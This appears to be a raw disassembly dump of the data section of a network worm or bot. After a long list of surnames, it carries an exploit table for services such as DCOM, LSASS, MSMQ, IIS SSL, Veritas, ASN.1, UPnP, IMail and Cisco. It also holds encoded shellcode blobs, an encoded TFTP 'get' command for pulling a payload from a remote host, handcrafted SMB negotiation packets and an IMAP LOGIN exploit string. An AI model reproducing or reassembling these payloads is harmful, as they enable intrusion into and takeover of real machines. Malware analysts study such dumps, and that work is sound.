dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset dword_430058
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset aVorhaus ; "Vorhaus"
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
align 10h
dword_43D760 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40AD00+BE�o
db 66h, 0B9h
word_43D76E dw 0FFFFh ; DATA XREF: sub_40AD00+C6�w
db 80h, 73h, 0Eh
byte_43D773 db 0FFh ; DATA XREF: sub_40AD00+CD�w
dd 0F9E243h
dword_43D778 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40AD00+9C�o
db 0B1h
byte_43D785 db 0FFh ; DATA XREF: sub_40AD00+A4�w
dw 7380h
db 0Ch
byte_43D789 db 0FFh ; DATA XREF: sub_40AD00+AA�w
dw 0E243h
dd 0F9h
dword_43D790 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40AC0D+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_43D7F4 dd 12h ; DATA XREF: sub_40AC0D+3B�w
dd 70746674h, 6578652Eh, 20692D20h
aGet db ' get ',0 ; DATA XREF: sub_40AC0D+7C�o
aJ_1 db 'j',0
db 0E8h
dword_43D80D dd 17h ; DATA XREF: sub_40AC0D+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_43D815 dd 1 ; DATA XREF: sub_40AC0D+43�w
byte_43D819 db 0, 6Ah, 0 ; DATA XREF: sub_40AC0D+C0�o
dd 7E8h
db 0, 0Fh, 84h
dword_43D823 dd 0FFFFFFEDh ; DATA XREF: sub_40AC0D+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h, 0
aNetbios_0 db 'netbios',0
db 2 dup(0)
aNetbios db 'NetBios',0 ; DATA XREF: sub_40B553+30�o
; seg000:0040C6D0�o ...
align 4
dd 5 dup(0)
dword_43D880 dd 8Bh ; DATA XREF: sub_40274D+1BB0�r
; sub_40274D+1BD9�o ...
dd offset loc_4100AE
dword_43D888 dd 0 ; DATA XREF: sub_40B3C5+2E�o
; seg000:0040C71B�r ...
dword_43D88C dd 0 ; DATA XREF: seg000:0040B6AE�r
dword_43D890 dd 0 ; DATA XREF: seg000:0040BA3A�r
dword_43D894 dd 0 ; DATA XREF: seg000:0040B915�r
aNtpass db 'ntpass',0
align 10h
dd 544E0000h, 73736150h, 6 dup(0)
dd 1BDh, 4100AEh, 4 dup(0)
aDcom135 db 'dcom135',0
dd 43440000h, 31204D4Fh, 3533h, 5 dup(0)
dd 87h, 40CC47h, 0
dd 1, 2 dup(0)
aDcom445 db 'dcom445',0
dd 43440000h, 34204D4Fh, 3534h, 5 dup(0)
dd 1BDh, 40CC47h, 0
dd 1, 2 dup(0)
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'DCOM 1025',0
dd 5 dup(0)
dd 401h, 40CC47h, 0
dd 1, 2 dup(0)
aLsass db 'lsass',0
align 10h
dd 4F480000h, 534C2044h, 535341h, 5 dup(0)
dd 1BDh, 40DC47h, 0
dd 1, 2 dup(0)
aLsasscb db 'lsasscb',0
dd 4F480000h, 534C2044h, 2D535341h, 4243h, 4 dup(0)
dd 1BDh, 40E220h, 0
dd 1, 0
dd 1, 7361736Ch, 35333173h, 4C500000h, 53534153h, 35333120h
dd 5 dup(0)
dd 87h, 4102B1h, 0
dd 1, 2 dup(0)
aLsass445 db 'lsass445',0
align 2
aPlsass445 db 'PLSASS 445',0
align 10h
dd 4 dup(0)
dd 1BDh, 4102B1h, 0
dd 1, 2 dup(0)
aLsass1025 db 'lsass1025',0
aPlsass1025 db 'PLSASS 1025',0
align 10h
dd 4 dup(0)
dd 401h, 4102B1h, 0
dd 1, 2 dup(0)
aWks_eng db 'wks_eng',0
dd 6B570000h, 63765373h, 676E4520h, 6873696Ch, 4 dup(0)
dd 1BDh, 4113B7h, 0
dd 1, 2 dup(0)
aWks_oth db 'wks_oth',0
dd 6B570000h, 63765373h, 68744F20h, 7265h, 4 dup(0)
dd 1BDh, 41143Fh, 0
dd 1, 2 dup(0)
aMsgsvc db 'msgsvc',0
align 10h
dd 654D0000h, 6E657373h, 726567h, 5 dup(0)
dd 87h, 40E596h, 0
dd 1, 2 dup(0)
aMsmq2103 db 'msmq2103',0
align 2
aMsmq2103_0 db 'MSMQ 2103',0
dd 5 dup(0)
dd 837h, 40FB58h, 0
dd 1, 2 dup(0)
aMsmq2105 db 'msmq2105',0
align 2
aMsmq2105_0 db 'MSMQ 2105',0
dd 5 dup(0)
dd 839h, 40FB58h, 0
dd 1, 2 dup(0)
aMsmq2107 db 'msmq2107',0
align 2
aMsmq2107_0 db 'MSMQ 2107',0
dd 5 dup(0)
dd 83Bh, 40FB58h, 0
dd 1, 2 dup(0)
aIis5ssl db 'iis5ssl',0
dd 49490000h, 53533553h, 4Ch, 5 dup(0)
dd 1BBh, 40CF1Eh, 0
dd 1, 0
dd 1, 64626577h, 7661h, 65570000h, 56414462h, 6 dup(0)
dd 50h, 410DA7h, 0
dd 1, 2 dup(0)
aVeritas db 'veritas',0
dd 65560000h, 61746972h, 61422073h, 70756B63h, 65784520h
dd 63h, 2 dup(0)
dd 17D5h, 410BAEh, 0
dd 1, 2 dup(0)
aAsn1http db 'asn1http',0
align 2
aAsn_1Http db 'ASN.1-HTTP',0
align 10h
dd 4 dup(0)
dd 50h, 40F6D1h, 0
dd 1, 2 dup(0)
aAsn1smb db 'asn1smb',0
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh, 40F6D1h, 0
dd 1, 2 dup(0)
aAsn1smbnt db 'asn1smbnt',0
aAsn_1SmbNt db 'ASN.1-SMB NT',0
align 10h
dd 4 dup(0)
dd 8Bh, 40F6D1h, 0
dd 1, 2 dup(0)
aUmpnp db 'umpnp',0
align 10h
dd 4D550000h, 506E50h, 6 dup(0)
dd 1BDh, 4106C6h, 0
dd 1, 2 dup(0)
aImail_0 db 'imail',0
align 10h
dd 4D490000h, 6C6961h, 6 dup(0)
dd 8Fh, 40D12Ch, 0
dd 1, 2 dup(0)
aMersin db 'mersin',0
align 10h
dd 4E560000h, 6F6F5243h, 726574h, 5 dup(0)
dd 170Ch, 41DDECh, 0
dd 1, 2 dup(0)
aCisco23 db 'cisco23',0
dd 69430000h, 206F6373h, 6E6C6554h, 7465h, 4 dup(0)
dd 17h, 40C5C6h, 4 dup(0)
aCisco80 db 'cisco80',0
dd 69430000h, 206F6373h, 50545448h, 5 dup(0)
dd 50h, 40C731h, 14h dup(0)
aLsass445_0 db 'lsass445',0
align 2
byte_43DF62 db 1 ; DATA XREF: sub_40274D:loc_404279�r
; sub_40274D+1B36�o
aMsmq2103_1 db 'msmq2103',0
dd 73610100h, 6D73316Eh, 62h, 1, 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
dword_43E108 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: seg000:0040CD25�o
; seg000:0040CE62�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43E158 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40CA2C+EB�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_43E4BC dd 20h, 0 ; DATA XREF: sub_40CA2C+FE�o
dd 20h, 5C005Ch, 0
off_43E4D0 dd offset aEeckeren ; DATA XREF: sub_40CA2C+12C�o
; "eeckeren"
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dword_43E510 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_40CA2C+143�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_40CA2C+18�o
; sub_40CA2C+59�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrr_0 db ''
db ''
db '',0
dword_43E620 dd 10016C6h ; DATA XREF: sub_40CA2C+CC�o
dword_43E624 dd 100139Dh ; DATA XREF: sub_40CA2C+C3�o
dword_43E628 dd 0E983C931h, 0D9EED9B0h, 5BF42474h, 2B137381h, 8313778Dh
; DATA XREF: sub_40CA2C+3C�o
dd 0F4E2FCEBh, 5E9CE7D7h, 0EC8874C3h, 7FFCEDD4h, 56FCA90Fh
dd 160B0617h, 98988C53h, 4CFC9564h, 5A9C8C0Bh, 12FCB9A0h
dd 8AB7BCC5h, 67B70987h, 1EBD4C2Ch, 0E79C4F2Ah, 3B53D910h
dd 4CFC685Eh, 759C8C0Fh, 983C81A0h, 0F8769174h, 9AFCA128h
dd 726BA947h, 77ACBCE8h, 9847CEA0h, 63FC816Bh, 53FC2037h
dd 9D1FD323h, 439B8365h, 40115BD4h, 2144E54Dh, 2104FA43h
dd 0C388D974h, 0EF9A4643h, 0C588DD10h, 75920474h, 117F60AAh
dd 0EC75E77Eh, 1AAEE5FBh, 0EC2020DEh, 4024DEFDh, 4034DE78h
dd 0C388DE68h, 0D470E54Dh, 0F2FEDE4Dh, 9D3E5BEh, 0EC204A5Bh
dd 4267E7FDh, 7BA7727Eh, 0FA59208Fh, 40A1727Ch, 7BA7727Eh
dd 5AF1C4CEh, 43A1727Ch, 0EC22D97Fh, 0F41F1EFBh, 440E4B52h
dd 0EC225BD4h, 771DEBFBh, 7E14E54Dh, 431D68A2h, 9ABBA472h
dd 9A33E7CCh, 0E0B7BCC9h, 3E357381h, 805BCFD5h, 0B84FF7A6h
dd 611F2680h, 0EC613ED5h, 0C588C95Eh, 4225DA70h, 121DDC7Ah
dd 4222DC7Ah, 0BE1F5DD4h, 40B988F2h, 0EC1D5BD4h, 0C388BAD4h
dd 908BDAA0h, 0C588E9EFh, 7BA77279h, 4C7307DBh, 0ECA17278h
dd 13778DFBh, 2 dup(0)
dword_43E788 dd 2016280h, 100BDh, 8F160001h, 182h, 2 dup(0) ; DATA XREF: seg000:0040CF45�o
byte_43E7A0 db 0EBh, 25h ; DATA XREF: seg000:0040CFCE�o
word_43E7A2 dw 0FAE9h ; DATA XREF: seg000:0040CFB4�o
dword_43E7A4 dd 0F677D399h, 596C0602h, 1DF8596Ch, 0D18CDE9Ch, 3D4704Ch
; DATA XREF: seg000:0040CFC4�o
dd 53574658h, 32335F32h, 4C4C442Eh, 0E805EB01h, 0FFFFFFF9h
dd 2CED835Dh, 6459306Ah, 408B018Bh, 1C708B0Ch, 8788BADh
dd 8B3C5F8Dh, 8BFB011Bh, 0FB01785Bh, 11C4B8Bh, 24538BF9h
dd 5153FA01h, 205B8B52h, 0C931FB01h, 99C03141h, 18B348Bh
dd 0C231ACFEh, 0C084E2D1h, 0B60FF775h, 448D0945h, 39660845h
dd 66E17510h, 585A1031h, 5250565Eh, 41104E2Bh, 4A0CB70Fh
dd 188048Bh, 4DB60FF8h, 8D448909h, 94DFED8h, 4DFEBE75h
dd 0FE177408h, 5D8D244Dh, 0D0FF531Ah, 26AC789h, 9458858h
dd 0C794580h, 8B5082EBh, 93350445h, 89939393h, 8B660445h
dd 35660245h, 89669393h, 89580245h, 53DB31CEh, 56535353h
dd 0D0FF5646h, 5855C789h, 6A308966h, 0FF575510h, 458DE055h
dd 55FF5088h, 0FF5555E8h, 448DEC55h, 53940C05h, 78652E68h
dd 635C6865h, 3194646Dh, 0CC458DD2h, 57575794h, 0CAFE5353h
dd 9452F201h, 5078458Dh, 5088458Dh, 535308B1h, 0CEFE106Ah
dd 53535352h, 0F055FF55h, 55FFFF6Ah, 0E4h
aA01Login db 'a01 LOGIN "&',0 ; DATA XREF: seg000:0040D243�o
align 10h
dword_43E8F0 dd 0E983C92Bh, 0FFFFE8B8h, 5EC0FFFFh, 0E00E7681h, 837C1F1Ah
; DATA XREF: seg000:0040D253�o
dd 0F4E2FCEEh, 31F4701Ch, 83E0E308h, 10947A1Fh, 39943EC4h
dd 796391DCh, 0F7F01B98h, 239402AFh, 35F41BC0h, 7D942E6Bh
dd 0E5DF2B0Eh, 8DF9E4Ch, 71D5DBE7h, 88F4D8E1h, 543B4EDBh
dd 2394FF95h, 1AF41BC4h, 0F754166Bh, 971E06BFh, 0F59436E3h
dd 1D033E8Ch, 18C42B23h, 0F72F596Bh, 0C9416A0h, 3C94B7FCh
dd 0F27744E8h, 2CF314AEh, 2F79CC1Fh, 4E2C7286h, 4E6C6D88h
dd 0ACE04EBFh, 80F2D188h, 0AAE04ADBh, 1AFA93BFh, 7E17F761h
dd 831D70B5h, 75C67230h, 8348B715h, 2F4C4936h, 3F4C59B3h
dd 14CFE5B3h
dword_43E9A8 dd 7D1F1A9Fh ; DATA XREF: seg000:0040D210�o
db 86h, 72h
word_43E9AE dw 0AE1Bh ; DATA XREF: seg000:0040D222�o
dd 9D964986h, 85F37275h, 83487A4Ah, 2D0F7036h, 1ACFE5B5h
dd 14797E8Ah, 2C757783h, 0F5D333B9h, 0F55B7007h, 8FDF2B02h
dd 81968F4Ah, 8232581Eh, 69236A2h, 0D7B4B1D8h, 0CFE16888h
dd 546AE5F6h, 2B44CC1Fh, 2D4E4BB2h, 2D4E1B8Ah, 0ACE04BB5h
dd 79C6B788h, 0AAE0492Eh, 4BE0E58Ah, 9B77CA1Fh, 8366DC99h
dd 0AAE01E95h, 83E36D1Fh, 0F6EF7230h, 834C45E4h, 7CCFE536h
dd 0
dword_43EA2C dd 4EBh ; DATA XREF: seg000:0040D2ED�o
; seg000:0040D31F�o ...
dword_43EA30 dd 100102EBh, 0 ; DATA XREF: seg000:0040D2FE�o
dword_43EA38 dd 100103BBh, 0 ; DATA XREF: seg000:0040D330�o
dword_43EA40 dd 100108CBh, 0 ; DATA XREF: seg000:0040D36B�o
dword_43EA48 dd 100102D9h, 0 ; DATA XREF: seg000:0040D3A6�o
dword_43EA50 dd 1001031Bh, 0 ; DATA XREF: seg000:0040D3D3�o
dword_43EA58 dd 10010269h, 0 ; DATA XREF: seg000:0040D411�o
dword_43EA60 dd 10010296h, 0 ; DATA XREF: seg000:0040D43E�o
dword_43EA68 dd 100102E2h, 0 ; DATA XREF: seg000:0040D46B�o
dword_43EA70 dd 100102E2h, 0 ; DATA XREF: seg000:0040D498�o
dword_43EA78 dd 100102E2h, 0 ; DATA XREF: seg000:0040D4C5�o
dword_43EA80 dd 100102E2h, 0 ; DATA XREF: seg000:0040D4F2�o
dword_43EA88 dd 10010302h, 0 ; DATA XREF: seg000:0040D51F�o
dword_43EA90 dd 100249D4h, 0 ; DATA XREF: seg000:0040D54C�o
dword_43EA98 dd 1001D9BBh, 0 ; DATA XREF: seg000:0040D579�o
dword_43EAA0 dd 100218E6h, 0 ; DATA XREF: seg000:0040D5A6�o
dword_43EAA8 dd 10021782h, 0 ; DATA XREF: seg000:0040D5D3�o
dword_43EAB0 dd 10021A51h, 0 ; DATA XREF: seg000:0040D5FD�o
dword_43EAB8 dd 10021A51h, 0 ; DATA XREF: seg000:0040D62B�o
dword_43EAC0 dd 10021A62h, 0 ; DATA XREF: seg000:0040D781�o
dword_43EAC8 dd 335B0FEBh, 0E98366C9h, 553380E0h, 0EBFAE243h, 0FFECE805h
; DATA XREF: seg000:0040D264�o
dd 0BB8CFFFFh, 0A171218Ch, 5F94D50Ch, 0AB98ABC5h, 15BCD598h
dd 0B4AAh
aWe0wn db '" "We0wn"',0Dh,0Ah,0 ; DATA XREF: seg000:0040D278�o
dword_43EB00 dd 4B5B10EBh, 0B966C933h, 34800125h, 0FAE2990Bh, 0EBE805EBh
; DATA XREF: sub_40DDD9+181�o
; sub_40DDD9+23E�o
dd 70FFFFFFh, 99999962h, 0A938FDC6h, 12999999h, 0E91295D9h
dd 0F1123485h, 0F36E1291h, 271C09Dh, 7B999999h, 0ABAAF160h
dd 0EEF19999h, 0CDC6ABEAh, 71128F66h, 71C09DF3h, 9999991Bh
dd 7518607Bh, 99999809h, 9898F1CDh, 0CF669999h, 0C9C9C989h
dd 0D9C9D9C9h, 8DCF66C9h
db 12h, 41h, 0F1h
byte_43EB6F db 0E6h ; DATA XREF: sub_40DDD9+130�o
dd 0F1989999h
db 9Bh, 99h
word_43EB76 dw 4B9Dh ; DATA XREF: sub_40DDD9+120�o
dd 89F35512h, 0CF66CAC8h, 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh
dd 0CD751AA9h, 0F3BDA514h, 7B32C08Ch, 0BDDD5F64h, 0DD67DD89h
dd 0C510A4BDh, 0C510D1BDh, 0C510D5BDh, 0DD14C9BDh, 0C9CD89BDh
dd 0F3C8C8C8h, 66C8C898h, 66C8A9EFh, 55129DCFh, 0A86666F3h
dd 0CA91CF66h, 6685CF66h, 0CFC895CFh, 12A5DC12h, 9AE1B1CDh
dd 0EB12CB4Ch, 0AA6C9AB9h, 34D8D050h, 42AA5C9Ah, 0A3892796h
dd 5891ED4Fh, 439A9452h, 0A26872D9h, 0C37EEC86h, 9ABDC312h
dd 9512FF44h, 85C312D2h, 9D12449Ah, 325C9A12h, 715AC0C7h
dd 66666699h, 7597D717h, 8F2A67EBh, 579C4034h, 0F9795776h
dd 0A2657452h, 346C9040h, 0F9336075h, 0E05FE07Eh, 0
dword_43EC40 dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
; DATA XREF: sub_40D7FE+159�o
; sub_40D7FE+216�o
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh
dword_43ECF0 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40D7FE+108�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_43EDD8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: seg000:0040DCBD�o
; seg000:0040E296�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 8
dword_43EE68 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:0040DCE9�o
; seg000:0040E2C2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_43EF18 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:0040DD10�o
; seg000:0040E2E9�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_43EFF8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+59�o
; sub_40DDD9+59�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_4: ; DATA XREF: sub_40D7FE+8B�o
; sub_40DDD9+8B�o
unicode 0, <C$>,0
a????? db '?????',0
align 10h
dword_43F060 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+2AE�o
; sub_40DDD9+2D3�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
